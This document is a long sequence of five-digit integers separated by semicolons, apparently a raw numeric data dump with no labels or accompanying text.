59280;27801;30360;47470;18099;27085;28684;20739;61468;57152;56021;22130;40354;23542;53518;44504;39153;12490;64107;53966;51852;30183;49265;12712;66643;49623;39347;63582;22755;44532;50872;59846;38512;63953;30212;14825;21677;24056;17463;39584;42522;55001;53997;59829;52817;22751;66520;33371;20889;44955;10788;57704;27630;63665;28459;42009;46486;64001;66598;13160;33452;23697;29213;45094;21474;38926;16375;60549;42177;29276;50311;46876;30952;44670;35034;31518;21211;11703;24829;54051;16575;16262;28070;55934;37288;63291;12515;21922;19952;20056;55846;18620;35377;28841;50378;56302;14585;15132;45593;12748;31006;28460;63522;66481;21407;49181;11470;53025;42916;42210;50607;31246;39510;57631;60520;34785;36518;29432;40193;19976;38492;63765;62183;30644;60628;56529;43604;45351;17462;47464;56866;21167;18122;27553;44444;31455;41297;54443;66274;13542;10320;23981;30112;18586;32688;44982;30674;14147;32474;19003;66012;34339;31364;57243;52890;45077;39002;39890;47251;27336;56227;56947;18132;12735;59111;37309;39499;40667;64170;37851;13021;25650;52745;16981;12356;59224;25547;10066;31866;57151;44606;46829;22818;17700;15067;31985;15451;66183;19865;13597;19664;21563;60922;45261;23171;40839;45971;48523;25357;53323;66259;38936;16712;35175;53031;16791;37659;23324;12573;62332;23496;35467;12213;41592;47555;12822;58111;15789;11206;28054;49409;45228;37025;33443;27710;61548;44370;13490;49366;35638;36343;66309;63266;17142;19037;64964;20485;15563;23222;32241;53442;34919;36863;35740;51416;23940;15706;31437;65953;49828;57059;16756;34000;40320;64424;63398;59401;66270;35341;20041;25049;18220;11567;14917;45504;63319;45542;12266;37490;38166;59498;64474;58215;21890;25810;66943;66858;15264;20330;66492;58424;30707;29438;43605;55099;45569;44179;51760;10475;13845;51417;45708;28468;31550;18594;35720;63013;52874;39057;44829;15567;42932;53253;29094;10011;17472;58588;48186;59612;63455;46459;32624;46814;42726;54172;10026;17079;13054;30890;14247;49670;55619;33343;29236;20829;32744;62791;31541;38451;10863;60538;21155;39210;19168;59604;34885;61143;43923;59345;58172;45540;61965;33003;39770;66449;31735;47398;64019;45961;26153;15790;65769;23024;11572;59138;30949;28343;54557;57923;16742;45529;61467;36430;42765;37014;38473;38521;45088;51218;14516;61730;33377;58033;46325;18958;30826;65277;35310;25407;61715;29970;64331;30147;56613;50617;51894;39912;56997;13873;12922;40879;36004;42661;24285;50465;58737;66335;66490;56076;27279;38626;19794;55054;50721;54766;37704;34671;56084;53344;55253;42222;25520;33405;54091;48807;40042;37486;35671;32794;20367;23601;32649;22479;39853;14570;66369;56476;16673;51499;41855;35568;28234;27356;63777;53514;15065;66338;30595;19957;10180;22828;61306;45495;47383;33772;26835;44771;14454;14773;27067;34538;57210;44439;32570;17583;33792;31630;38456;27476;27879;24286;23297;26673;24411;53692;17350;45175;31414;61251;10478;30753;34505;57004;54071;30203;59010;50329;65079;28530;66483;43020;33634;38901;13888;52001;29070;15953;24719;31694;30538;20275;19981;60822;42169;20623;54743;12046;23415;10723;52518;31867;27558;28112;47409;33743;34466;35307;23480;27625;33126;46409;42406;51723;52903;59241;10994;45239;29709;66069;25167;63813;59012;31012;59696;20248;44718;48236;24964;44164;63629;49904;44683;20924;37902;62075;21126;64126;51189;44555;45480;32022;31511;19833;16654;38048;27047;66703;22941;32009;21229;55268;21409;46573;16356;22728;20444;36145;46893;25432;54712;37464;63012;44946;51661;50336;42488;30555;27968;36999;30202;57058;45259;31832;12986;42920;32629;25734;38617;24997;58280;25878;62178;59730;61101;60216;66971;36517;36484;32704;26421;46412;62732;55837;57581;46059;21579;65063;45064;36105;41436;23123;50446;54332;49519;55274;27437;57915;52685;19308;10299;39007;12393;25884;25355;18310;13610;30343;59929;65438;25969;49038;44981;34920;60881;17554;34187;42729;23900;17699;65371;61991;58948;35309;40296;59072;19886;39257;64503;33232;40348;52346;14711;24506;51351;18505;51595;36892;31506;56632;49429;43698;36933;51513;54290;63793;59104;61064;58036;53391;11118;55500;52483;16205;33730;46092;33498;23597;18626;27093;33336;24184;52303;44337;58333;17999;63568;66585;29171;14643;23199;56908;25772;31940;44163;10647;29128;63788;27109;31236;49009;19940;49372;27794;60186;35066;62925;19309;58771;59759;34092;60977;61653;43007;32984;16015;19568;28093;26832;25700;48688;16665;55384;36247;22499;50616;29298;66888;41864;35148;64270;62771;38406;63353;52750;60880;51763;55878;56079;54401;59101;51974;15646;51601;56447;23276;35970;64706;25158;44845;37720;30403;57315;10499;59643;15296;12417;58484;14755;50508;58572;55114;26060;21287;36406;41749;62688;24646;13790;24793;52060;59834;57908;66742;57200;15817;28172;22489;26399;25422;34049;32972;11439;36616;66295;64587;60862;16398;63255;57528;10024;49803;29533;35412;29212;63211;30532;20286;37779;52713;51772;27914;56601;62322;47184;52940;53040;29528;12436;15711;24020;52467;23103;20027;53195;62417;46159;51348;58038;56679;22783;28961;23492;33195;36668;45405;64473;64576;47124;18813;34006;32480;39448;19397;16933;57112;19635;59079;14173;57400;58897;55280;50251;52672;18054;29100;15630;53979;58331;26128;32992;23433;59832;58469;45260;28627;34263;10703;57818;38951;29480;53098;14108;58251;37125;19933;46768;54624;64829;20885;29716;13523;22410;47128;50255;18075;15505;22826;23190;38868;30592;58374;56968;26221;43822;61777;13167;58863;45770;21220;19287;30497;31903;65642;14091;37188;42546;11371;46484;61136;33043;24643;25894;65713;15448;32926;55616;26111;58441;15056;10497;49907;41545;50942;10106;59819;30434;38545;30802;21191;34539;61455;18196;23586;22674;47901;66137;66646;61774;39635;44843;30944;50280;27302;52253;44595;12405;61160;32279;52603;10207;36128;20579;60406;53652;15692;52309;42843;16063;14838;35089;23969;59414;49789;29889;22095;60417;41288;17501;27957;17156;66115;28076;12607;16646;42450;14109;55689;66214;65904;66814;61147;32518;29643;41927;48669;27586;11476;57518;48671;23356;35765;24093;11753;12248;16779;58961;65847;35781;32987;30406;24984;31522;25686;28556;63957;21494;12871;53501;27578;53508;53815;51317;17499;65134;38138;60996;25348;45338;12238;64746;54917;33670;50243;39629;42570;12570;32228;45004;62970;18686;32747;54695;10466;34753;29936;22732;33883;43021;40132;30939;40897;55334;61517;34396;49105;65889;57931;48820;53201;17340;34683;62251;59519;39074;21036;29468;54632;60179;41951;19858;43155;11423;11909;24797;61303;17593;52877;12667;41260;31809;20632;30107;14505;60975;55447;53512;24014;31058;53653;57461;42736;29541;18596;57820;59926;38001;23750;34918;62559;54816;20634;17810;48224;30452;63250;22836;13570;37997;57365;35142;34591;18197;21990;36166;28150;64579;63069;26463;23078;27082;48973;20252;19987;25216;65947;44863;41008;28960;54582;38773;57275;53528;47211;30774;17991;25566;29096;37587;33663;44079;26754;57746;50324;14176;28660;10966;52617;32809;30627;59261;64206;37871;61860;21529;57687;57258;62194;23956;66622;48337;32918;14698;40377;21024;41859;15968;10724;62457;53398;58821;29265;37346;53713;33810;56992;64727;43361;17630;13270;43954;29341;26145;54939;61403;60712;52501;34319;41243;49906;29374;40058;27056;57088;46910;24399;61763;51973;53720;47858;31534;33947;49054;28273;56151;53238;55715;50592;54818;13372;52920;57366;33675;38608;33928;36834;25387;48846;62533;51220;43290;66669;16946;44742;32601;65979;43291;19268;38700;66470;51478;26195;32439;45688;21431;28764;25633;34748;23069;35626;41209;66080;45707;31624;61385;21209;55752;31779;17997;63192;52844;11623;26744;65367;16113;65909;22077;31504;15586;28083;25193;13861;49504;44611;19068;55177;57620;47323;48693;50610;21165;24547;11878;54991;24198;30935;66896;30652;24435;57022;38475;48760;25382;38637;33311;33329;34689;36138;60742;45188;33451;13733;33676;10871;32501;30185;56071;11368;13168;54841;64316;66350;32101;26203;33629;56604;27458;24741;57403;40758;27539;62190;34265;63038;53331;39683;28650;57214;49368;61739;13653;46012;43171;34448;20293;47599;29206;31998;53296;33918;55764;56687;28174;19739;65278;54457;34470;18608;37242;63764;54946;32791;50620;62140;25900;39408;16850;29675;45596;11062;34418;38595;46642;41444;42624;66182;55070;21622;21879;32812;52628;44570;43067;12445;12862;30367;42995;21926;10925;60771;47543;14245;62049;16150;42686;49690;12698;23759;66114;24907;21969;60441;54275;16992;61342;14418;21876;66280;40263;32243;44784;27032;54659;62159;60414;30269;24985;45932;59393;54929;14743;28477;19415;25967;58311;54359;60394;21737;63792;37935;50802;39369;22183;20937;10260;43743;44824;58947;54232;31697;59586;23195;49540;64897;50783;12312;44672;18875;27584;24059;39694;62489;43803;14523;26371;20526;60114;50379;20446;64251;36390;40268;25014;26001;47238;56278;41160;25496;36337;31395;51727;64736;63895;27121;40612;23386;50572;21410;48828;17032;45991;65215;45763;63669;46408;53625;47871;51620;56365;21113;31788;26357;41854;52769;17210;31225;52676;24971;30286;49162;34949;51086;25464;30981;27670;54379;24834;26170;23831;49534;24660;57854;29960;17588;52717;10363;13781;55882;31969;34888;25253;29175;35693;10582;61550;52966;43755;31146;55281;40422;47542;40154;15984;37637;52477;12083;36441;46003;25501;15277;57132;31882;21144;44076;17772;10853;57898;61197;33105;38058;46248;12365;39745;47541;38782;47517;29373;56527;62015;52463;62829;32477;38983;13509;48892;24977;23180;54683;40934;56767;16636;56357;24298;22657;45766;46006;40585;55996;20996;48587;54035;49268;47003;19679;55770;46493;15299;48636;15124;22661;12809;49081;36791;34258;53562;52457;37836;58856;63139;39240;17442;32594;15943;32125;50557;53268;30459;19760;42142;39192;46113;13596;48832;61187;21093;44028;37624;19389;62346;57538;15007;45374;14486;50918;10963;48902;12720;18072;42216;56712;52751;54715;60207;61650;11554;62206;16153;14488;23978;63555;35189;29959;22961;63331;20803;23619;12825;42851;30705;46475;28381;12623;44780;17465;16036;40958;14196;60957;60841;19753;24591;22709;50927;37606;63480;52101;32219;56057;25682;22983;46937;43317;32109;58766;65850;47239;42940;53389;24204;65722;31379;19421;32562;17088;57853;42629;31264;64309;13174;49878;17536;29250;40136;66444;59582;52583;15288;55538;26944;38315;60447;23091;63955;57118;51396;66561;12965;32821;24678;16075;36236;37909;38661;12970;30837;32138;33198;57406;65257;53168;55739;23722;21376;65148;23532;66110;23564;31336;40359;62671;22072;54248;50362;26076;54300;25731;51428;64602;22070;19555;60404;55638;22693;34765;49286;25364;43840;26743;61176;33650;15048;18546;10359;12643;34870;20756;36169;42437;39128;29682;35133;61006;54684;54722;38859;46817;60660;34285;37252;51854;28491;55314;20280;55146;47414;37496;22088;43043;10974;45927;64217;33898;38306;49573;38590;65934;62359;59921;15330;44026;47287;22764;18815;18633;49642;64679;19782;55724;10439;38723;55556;12115;26219;25830;42540;61677;15523;25236;49047;48449;15290;29060;64320;36388;51880;65921;10191;53126;18863;18525;63026;59387;30246;18998;49999;44103;45455;37363;28639;45994;56293;48277;47494;66458;63244;28514;21956;53963;35213;44986;59732;19072;51631;45073;57529;62055;50400;62697;38694;15590;50141;66189;28926;32132;32024;14606;13044;64235;39669;25742;64228;34522;24801;63588;37778;15352;20003;41157;44455;56038;36841;60257;21790;58211;39140;41892;10398;30498;35592;66217;37962;12284;10091;46920;64559;24837;23247;56255;49793;39942;12588;13126;47859;59495;31031;20188;32425;28304;41270;16457;65592;50186;39141;43929;66868;64365;40191;26015;16086;41445;31908;37517;50781;62177;48939;29914;64925;27856;31819;42316;29867;16970;53374;28240;47365;13190;52318;62886;65872;28179;54772;33068;43827;11134;44316;29512;27236;63453;48577;66301;62225;22238;17339;55299;57219;28700;61216;14494;21933;64744;10857;65879;20187;35166;53797;29255;22548;17601;62375;21752;65170;53080;25390;50117;32378;15247;27883;18826;39072;21434;64147;40349;16541;56492;20045;36495;27846;30130;47606;50108;31337;40225;54361;64842;10280;46879;62817;32476;47107;56283;52768;13384;58164;40505;35950;58970;15558;65285;43495;27559;15061;13428;11586;43338;44044;63324;18539;18411;66147;31742;50421;11784;42871;61319;18254;64452;31976;48517;32156;27521;24848;52840;66973;43725;29486;38568;23643;20811;58306;46888;40683;27683;19737;63740;22905;12314;53634;19885;53258;46221;29589;51632;65754;10896;11920;57613;52825;52836;14588;54726;46299;36799;25361;23833;16243;56179;54996;45385;37074;24433;60420;54672;52044;45321;38509;31677;51655;19056;59756;17315;54284;24230;30470;63341;36357;64987;51860;29644;51237;26295;13327;58107;32063;21656;51246;15993;27338;30997;19969;27269;25586;56292;40802;21127;62635;11890;28800;62701;29178;60697;45021;38062;46279;35867;15533;65980;48696;36308;18342;58278;40322;25494;20670;64113;13086;49214;28673;31958;23758;52597;11887;64582;51673;55644;47762;15064;19900;28698;66256;61074;43206;47495;63147;31465;32510;29350;19116;26533;21610;58013;17003;39883;21569;33333;21965;52495;51580;28748;48539;10951;61818;66019;25455;57477;60107;23573;13722;39834;24101;62252;26429;32148;60830;65898;36783;57067;26586;54397;35380;54597;43201;32284;53112;41483;40008;43296;47664;43531;61435;35037;10727;12941;52403;29550;17034;50346;15159;28211;30889;42314;45554;53159;48396;24338;65091;10530;40216;33321;41036;12765;24625;56589;36392;54381;58562;44075;26008;53649;23549;60692;57983;52814;12788;42642;33874;42911;27901;31461;34903;56917;23129;64518;14479;45570;49628;37824;24175;59013;33071;64971;26608;47250;22848;33574;66446;19382;31664;55771;55361;10395;40678;61703;30383;15808;11508;29538;28153;59417;40248;51032;53367;10979;52864;34905;42822;16780;35518;39423;35725;38149;21575;66926;30336;53143;13885;31746;46033;11340;29872;14491;21651;19338;29893;15355;39861;61566;65004;34629;62500;41794;46429;10721;19113;41805;30667;43887;24953;30915;27561;32074;27490;63704;17585;46206;60774;25323;46907;49320;16690;32359;42842;33055;42738;22532;64259;15660;48853;50315;46932;14463;23724;10716;16440;32737;56480;14001;18275;20920;25380;35791;58630;23357;42846;27340;23797;39852;57943;59171;31990;16929;55928;57066;53641;57895;32123;26052;27845;21518;19908;60656;47207;30504;32837;28022;29296;47400;38987;64697;13531;42921;12057;50391;43003;37829;44422;66396;40821;24831;31340;45341;40695;44299;51786;27495;20603;40155;56027;24127;20379;23606;61092;66388;54970;46939;53425;13314;13842;53154;21354;23367;46892;47291;31526;62166;43412;65728;61051;45474;51403;44876;33264;17616;46271;35761;60000;20753;58421;48716;52514;27768;60155;29049;14966;45651;20441;24657;64652;33006;65666;26692;12705;39179;58950;20549;39961;36566;35232;51821;54740;32176;14103;28345;21763;59672;20199;66750;59693;21216;25821;25743;53274;62078;52023;39645;52285;51332;52912;45963;50193;51433;21620;60333;19271;66033;20039;34364;29699;33746;12689;58267;66549;43372;39762;13422;23772;27355;45853;35514;52319;49230;66028;49619;34156;33316;48201;54272;51486;31406;59489;59133;48810;50403;25372;49805;48656;32544;26747;30835;62281;51966;56183;31440;64400;22789;61395;49647;66008;11840;19347;22290;35977;55740;66648;59410;32746;11507;19358;39564;25281;20927;49743;14616;54048;54563;17730;59615;48776;21130;35777;12554;60907;26776;28767;21782;10584;33755;66802;53506;25570;32548;13334;40967;38347;50007;28774;34241;35279;26051;22889;29139;50748;50930;40300;34906;31098;58479;23757;48711;47760;56576;36289;31745;17345;37158;47321;48802;50589;13252;61039;13703;48475;30433;55313;63086;59228;55872;66786;25010;44382;27656;16874;48422;55344;50105;42191;61094;66283;46284;48579;57091;19773;58769;53116;31603;36948;48694;40336;53309;52590;54146;17803;36091;24315;17809;59473;64673;26082;44905;19669;63933;61152;53672;25139;17600;41256;29829;53610;60556;36824;51587;61079;27283;55903;34639;63226;48769;27941;35665;44116;42249;34262;58617;36613;43547;13649;49697;53487;14538;35597;16103;12731;58130;47156;29217;63782;45940;54709;46496;32254;36674;62930;30761;46543;28680;42290;41305;18880;39681;56597;14266;46470;55179;36217;55588;29505;29864;15601;27933;62106;56453;24658;61848;59610;15101;62000;12330;56804;65777;23082;20824;28284;39818;44542;33167;40768;38559;19221;49674;40409;54252;35553;25197;36547;61226;32674;49211;45992;11155;40825;63640;48817;33540;23254;11539;63605;53017;23259;18281;42281;26055;15904;32645;11480;60868;49572;57563;29813;40023;14628;42038;30506;20736;14601;35654;28711;51551;27076;47653;44250;52137;41916;20541;43566;15958;54088;29144;61054;41961;65288;26433;31001;27104;41691;11366;59291;64661;12549;39335;10362;27107;12594;40052;27566;28645;46601;28889;49174;57536;29251;61707;65153;51495;53580;20624;34648;40901;53560;39856;65714;13193;46536;59297;25047;42743;37454;48347;33996;19659;44659;35217;47842;44740;45952;42416;52830;62165;48414;60234;45624;63378;38885;43132;63281;61256;53642;30611;28097;62631;57499;64334;64131;49134;35060;44517;44812;63809;56088;65149;62026;59125;19070;50002;21539;58341;23151;48448;13226;58476;41912;58717;53232;61431;25854;58153;43214;64190;17314;35635;27943;13364;10882;26918;26549;33756;12082;53317;50713;21954;51944;32175;59995;63987;63539;27272;42007;27313;15228;18948;39967;57556;25910;49703;11899;36832;13518;62042;54218;50968;14741;20297;38837;63747;47032;51380;56467;52140;59120;64586;44265;29822;48836;31928;39168;22814;46963;38738;25723;36460;43842;27758;18635;15079;62182;62737;25871;20522;17734;48976;57223;23853;15069;55005;63672;22715;15328;44967;61843;26004;22349;64129;53952;51749;21873;22115;25087;28586;58454;58816;50326;25562;63107;30982;61200;15015;48285;44296;61970;58024;30670;13149;36061;10195;53289;10423;10596;29686;20205;18470;64099;12848;66473;57755;61346;51694;61440;65693;52820;47389;19025;18947;23613;24513;32995;27214;56124;59143;14967;50110;18023;61348;48993;34452;56499;31891;30348;49077;21118;33162;55369;53180;34775;50726;54942;26044;20463;59626;52127;41589;14316;28313;66736;30759;27012;60130;61076;25136;15310;58377;40269;33537;60453;39847;60041;63240;28540;38021;55390;42066;11002;24164;63911;17243;35153;61290;63983;40492;21723;28863;64855;60946;39431;29775;63675;13448;58214;60741;35859;65216;26065;42463;11844;44704;23105;26214;30407;57678;63961;58643;13911;54343;38215;63575;34215;21317;10215;42588;65935;40950;16287;28105;38348;57590;27073;35372;50528;24372;43513;42925;33550;49472;54820;52792;22704;18248;63006;29896;24966;17770;53436;10022;59591;58577;57246;46406;63118;10826;41332;26575;27760;61202;35767;14958;37965;20645;18233;57773;26374;62397;60953;59947;64471;14124;16050;54402;33197;59232;62848;42858;38224;66055;29099;27500;35354;53769;63438;56049;17437;36302;45407;60821;31065;50549;47342;51411;34857;25190;28874;52091;61067;50780;33205;20765;42919;41522;38600;49302;37679;43752;40771;66344;64711;20985;14657;37027;52064;12936;36706;14942;22165;41731;14674;22947;29428;55880;57391;62554;53198;23451;41321;42714;41771;51413;24187;30164;22701;33518;43402;17401;36764;58763;51847;64069;55808;13967;57776;33341;15477;10961;16951;50115;31797;32567;50291;16119;13770;13316;28236;43340;66691;39076;40361;54451;22269;63737;13788;38413;36910;12041;20437;20882;14813;35889;52274;61100;18337;42694;60527;23420;41494;57839;27579;36808;38583;19151;21094;15617;16215;50084;60653;30448;34009;54628;11044;34728;28510;36280;50422;58492;32342;62767;16487;36445;17155;57026;66163;18970;42162;16743;46850;61163;46306;33853;21428;58805;33435;38159;31265;60708;41591;56296;35932;66153;36731;53640;58694;42937;18728;43951;29853;15691;20858;19604;31954;52193;21270;32160;15223;52227;26983;18504;42724;43072;65208;52726;49995;59383;49396;48549;11230;59052;63695;17975;39509;42019;12339;63466;18788;64577;30984;19591;44411;66228;17516;36188;50178;28315;29412;36379;41661;32823;30673;21874;15255;40961;28522;19272;52100;36051;45532;15010;24314;19956;50634;11441;21106;15082;60344;49196;36312;10188;37211;18198;56878;29149;36000;62948;56254;28102;49339;18617;63776;42303;34526;46171;25096;30760;20449;48840;57797;58655;58163;58658;20656;66485;38282;14794;20082;21251;32841;15559;13869;48887;39161;15169;11484;29903;55833;29126;46636;18685;59349;40817;15509;28693;55688;42286;20390;64880;29290;17506;40208;30661;31462;27560;64794;38938;47005;62392;38197;53441;52811;52842;22542;21486;10107;64527;32032;35121;61602;46009;42901;55272;25631;62076;45600;25287;64032;35038;19734;57459;11936;26594;54579;26734;61922;37134;48608;24645;20370;35371;41988;65051;41802;26520;43864;49562;62053;18189;63382;27179;55429;63641;28865;24945;27469;64784;25527;22105;34569;64637;13742;24595;54614;43215;56391;57001;65739;27849;31481;36759;21661;61186;44453;35077;12342;55990;53990;51151;17204;58089;23393;11087;27331;39382;49586;23921;17647;16786;54375;24494;55652;32564;53974;46665;15192;59708;50929;47151;17387;16686;25000;24943;59754;17245;54800;13661;30378;52647;21102;35004;59159;29827;64478;60561;66875;54657;21033;11822;46024;23328;22610;50204;25257;15768;46107;22639;21700;20566;62868;42062;58685;30891;15134;52458;24058;49108;43764;55661;30833;17976;57540;38459;59508;36202;24156;26786;57639;51622;54669;56562;58792;37391;52703;41251;33621;35155;39333;35600;37141;23483;22498;28545;39715;47379;54897;34306;16172;60232;33013;10640;10163;58852;58826;33281;24432;26301;46487;39682;34542;41899;54908;12293;12958;48778;10055;50044;32209;15596;24389;50718;30229;37236;29064;29023;26389;24466;20362;54731;62184;44827;51652;47788;24675;11450;33208;31644;14822;14839;65873;65648;35397;66543;14745;46620;46365;44287;63496;58382;43125;49029;14003;42896;34415;47574;48758;30559;43779;64068;59688;20346;32143;13811;16167;55323;19783;38731;59637;20054;46500;58318;48317;28361;52714;11124;59898;66445;38000;13105;55547;24777;29610;53213;53214;17796;28373;14668;11716;28232;51628;27297;62582;42200;41903;22568;31725;56987;34401;12469;43095;27311;43917;15799;63515;62012;37683;63278;22688;66715;48872;21356;65859;21129;64872;18760;56858;55925;12308;48583;47285;44575;27092;60662;13239;65560;40671;57609;28296;15851;47411;55953;64102;27737;19362;28200;66131;60986;39473;20102;28778;25616;39219;10679;40022;57780;64434;42104;46501;30603;15510;29565;45681;49333;41277;23136;39993;65469;38816;65937;13066;32763;56828;24189;47139;54856;36158;44855;35015;28910;63215;17632;30080;63021;40816;34662;33465;26425;59076;21101;12080;41340;42638;29658;29181;35564;28203;14804;28440;13577;65784;28536;26202;11708;55193;29458;65661;31182;43482;24318;32676;57011;33254;46010;42664;52451;38293;49283;56347;12032;15374;21456;30589;24662;18182;24376;41797;66523;51136;38836;50483;11278;47048;27664;34897;14426;10246;37631;38997;17368;17703;15392;63464;16871;24590;26143;15879;42369;63336;65795;62384;16289;65040;23030;12545;50655;45244;66617;48378;48288;18397;28041;50201;57676;50385;60501;36666;18574;25597;13641;59838;42862;55765;18800;12373;22454;24440;60997;27983;18627;55865;25935;56967;51116;12020;26474;66404;57806;43936;10287;13111;41336;20117;38195;43997;33471;51810;61016;62933;21867;19035;29132;19471;65646;37754;64274;23332;60298;29398;47405;54190;24112;60970;41564;26966;38415;48556;19518;54815;58650;43243;63445;12815;11846;47904;65518;22148;64548;49486;40032;46183;47024;12430;32469;48654;27825;28904;27924;60358;51483;31752;57852;66633;23371;54670;64892;16311;22706;18030;24128;14305;43514;63967;10027;48658;32749;23690;47353;13307;53424;26564;47661;39523;35625;55396;36153;65608;61448;51666;19765;46749;47448;56497;35254;35497;24148;22443;40071;21151;65826;32871;53110;41360;55709;27376;44091;24493;31814;25499;39164;63712;29028;36498;64266;48580;28453;18439;56571;25966;55413;23053;27954;32335;42915;52176;44186;63803;25209;19407;49199;15191;57889;60904;10717;13946;15762;25194;61419;17468;65057;11210;45751;37571;58604;40557;50789;22446;19834;47444;46340;18706;34082;15083;61241;28199;11862;50080;26507;40922;45125;12868;47020;61217;59650;40294;57510;42792;50312;31807;53062;58706;48911;34521;15946;61850;22698;59793;21348;48535;31744;13135;27347;10960;22776;35215;21383;28806;51228;32968;36917;33274;48992;47204;18883;23838;49510;51910;61520;50479;18952;51329;31137;19463;57683;19248;63973;45791;23471;49180;54192;65865;18212;32341;12053;63146;17029;63435;41032;62029;60876;41996;62590;15416;13910;14926;25055;26147;51753;63725;42308;42231;50271;40645;43812;32188;37043;26415;32927;53166;52807;59843;63441;58383;33060;39514;34540;61401;47540;38099;43365;39528;55621;39496;45943;62113;54759;23124;66728;37716;45161;53357;12860;15735;60349;49493;15323;54337;43774;56880;53944;49672;35353;55759;14532;43336;52341;40500;32630;33637;60931;62920;32693;20899;34560;54903;11527;41667;50935;38455;17349;54104;15989;51754;19520;65052;63414;21805;19079;63356;29957;49440;56673;46369;39099;47508;46542;42654;38972;34876;66441;49860;52616;16212;59016;41983;46063;28268;47623;10678;23927;13699;52097;26131;26479;66376;43617;64508;32507;25699;12833;63766;43768;64340;34692;12586;29749;59721;65759;60562;46901;58638;17649;10253;24309;32094;42545;43466;43065;51271;42503;59939;23337;14324;43420;47650;12585;32319;56334;46706;51890;35113;18985;40865;28736;47059;45531;29568;13433;19763;38377;31547;13420;64394;40468;57140;26634;22999;52675;13896;58057;63306;44339;16087;62394;52630;61540;59357;37509;31417;19177;33544;32044;61641;30516;19292;36736;59102;13797;30812;23760;25178;13155;10092;31994;23397;41997;32546;54565;34714;37494;15334;11251;24199;49850;49458;17139;27197;50014;21096;47121;10924;61720;56590;52702;35244;55449;37328;29655;12425;13138;57134;33694;50256;62516;46815;65125;33891;32315;51293;36258;32675;26892;53061;65032;10594;34301;30084;56645;53894;27631;59997;64388;28420;50686;25556;66857;14234;50848;11701;21527;23381;38771;51077;56305;15777;19890;36313;46740;49926;37724;17234;46923;34850;22630;64550;60372;58992;20966;35440;15335;35070;26222;65597;61598;24216;10701;23581;27975;24571;23127;32217;34930;58989;11604;11461;47051;56778;15238;32765;61613;28722;57169;31078;11782;19165;65241;15053;16910;23365;64287;45957;63714;26813;19556;24896;24259;55477;22439;49131;30675;34858;32974;25551;16704;11273;40733;55249;58539;65515;41800;12824;64822;40179;32797;15825;13467;17191;52882;53281;17615;31982;62537;17623;46538;22852;38121;48547;22873;11257;58828;26478;54545;13397;17419;44034;34378;35370;11011;62452;45349;54981;60300;29995;35009;45931;19076;52510;57735;34103;64604;66649;41107;18260;32719;43960;10602;36968;53076;53427;23864;35382;39559;54348;46508;27010;29951;13588;47007;20553;52146;16657;47610;49509;18208;19181;14199;59769;60286;19898;63642;49692;56454;29912;44172;66245;37340;10283;20910;16664;32408;17836;17123;22331;57562;24579;10547;50119;48553;31723;13290;34674;10365;12037;33407;26622;12353;66730;34682;21886;43919;59153;24640;13431;21254;53651;23110;44637;11098;19178;17510;58647;50174;61568;35742;20976;57822;47408;28881;33300;54765;31284;56062;40424;42602;55528;56852;57748;51141;55311;20141;42155;48492;51959;66958;34563;14132;31766;34854;60611;40710;54486;29672;56763;17227;19300;30733;60792;31698;34506;30993;37764;20538;22778;45033;31150;43205;57783;25671;18704;31846;14935;51920;61397;29026;28911;38164;34736;13224;52932;31640;48653;64724;64670;17285;51131;41936;20570;32908;30089;22469;15071;43058;31424;38405;42381;38414;43979;46681;21746;41070;26413;45728;22417;33859;23943;44798;65439;48722;13424;47833;33594;41301;57283;13137;49651;20763;19121;13461;65086;47698;60442;65572;10620;44565;64244;25921;48754;62814;53051;32887;52577;18301;47200;12127;47234;35674;58510;59024;57645;50582;23122;46872;14681;43700;39251;61808;45170;40822;15732;42893;23566;46290;48374;21631;44903;18556;27156;61643;29257;18799;54441;50412;60101;45998;65041;64708;48572;37325;62756;25769;14237;59758;52530;13602;57479;53052;41829;35434;66581;32605;32263;55418;32655;60438;59441;62604;60359;49426;55354;57209;57584;15613;14764;41876;44270;55844;49898;21057;66169;35281;60370;53139;53615;20856;45236;48320;65876;49388;45400;31388;16864;34530;33037;36374;49866;36226;15651;65320;51889;65493;40159;63673;21405;10712;20591;36555;66241;36986;44402;12485;53329;53266;60045;29592;27601;54901;36292;25938;37956;10828;26171;52527;18547;34407;62530;27931;56121;22908;24195;40433;26013;35073;32333;41544;66243;33398;35914;20108;63475;55838;49543;41227;33434;42445;66735;16685;29819;56069;60951;41149;26883;59432;64654;64240;56814;62509;41675;17733;19449;20576;60791;17776;56931;12675;11720;65875;54406;62565;20647;44484;24102;56517;28028;49037;24878;64226;37644;42551;27720;21341;49502;33373;62761;35918;42899;33914;45771;16550;64506;58861;18195;61017;32382;11156;50205;49309;45804;10068;49608;59215;50896;63657;13215;47706;28571;39838;11752;29393;13893;28016;13037;29160;38511;23272;45242;43636;12061;30853;66664;13603;51427;56416;27460;18740;39223;28496;63965;11922;56976;48777;66240;45262;12778;11591;25429;35143;18801;19080;12226;33390;25911;64335;66393;29880;51183;15467;40327;12382;27299;59211;24770;33944;13686;28195;51626;41387;21617;54707;56270;13173;11924;56171;46810;48312;19156;41801;15420;49676;62618;63469;25693;63395;60157;59475;31082;20607;39269;55343;34343;27023;26638;10563;62999;21467;11628;66767;35557;48322;23576;10133;11466;51179;61349;14477;14209;34655;25614;11640;50365;58595;65737;25763;59124;32614;66636;38612;22979;29233;11159;66209;25466;11682;18380;21711;30551;55915;10104;56189;25074;59720;58879;42631;41131;42355;32240;40994;25545;40712;14380;13931;47057;65840;42195;36256;43853;20725;17683;64076;29370;60433;19126;49920;39911;32508;36949;53432;34188;41021;30696;59959;43480;25856;11763;36716;20709;24959;18046;53127;21519;17559;51114;44711;60783;19814;25912;40116;34772;46858;58622;27824;24937;58178;65354;66909;48707;56966;39160;25016;57060;30832;16423;17663;18790;53731;51269;53922;43796;35055;36410;34720;37260;11865;17267;39403;20550;63176;25493;25041;29807;46304;43550;40040;35363;50563;60686;63688;26606;40793;48545;15209;20769;39608;52072;56806;32348;34475;34567;39879;55184;52656;41335;52497;20701;20839;45172;60834;37910;31993;46663;23025;22745;63059;56557;25555;53582;30945;24355;17978;64928;60169;10424;28340;18186;10626;31918;44440;25275;10372;55250;17429;53302;63664;33305;10076;12894;32052;30855;41446;56846;24763;27320;43010;40451;55335;10535;43448;14175;39835;26864;41438;65364;28227;42913;19277;23138;49330;25351;52169;16577;42242;65575;18838;17190;16280;32989;59497;61837;21260;38198;34641;42974;52213;58063;26293;65601;58002;50509;39487;47711;47137;49155;40639;53785;21705;52099;48808;54449;62328;22676;42478;27997;33975;59499;33356;63465;63089;44657;14782;23164;16626;34923;29121;29278;40517;11854;13023;44578;29692;34716;28672;21147;38255;42763;58979;19483;21948;18422;64075;40405;60304;49780;34583;48459;11075;47683;50521;36269;38646;20155;15792;65710;21358;33444;